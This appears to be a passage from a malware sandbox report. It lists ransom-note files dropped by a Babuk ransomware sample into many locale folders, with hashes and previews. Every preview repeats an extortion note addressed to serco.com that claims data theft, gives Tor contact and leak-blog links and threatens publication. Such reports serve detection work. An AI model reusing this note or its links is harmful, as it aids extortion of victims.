                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\az-Latn-AZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\bg-BG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\bn-BD\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ca-ES\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\cs-CZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\da-DK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-AT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-CH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-DE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-LI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-LU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\el-GR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-029\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-AU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-BZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-CA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-GB\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
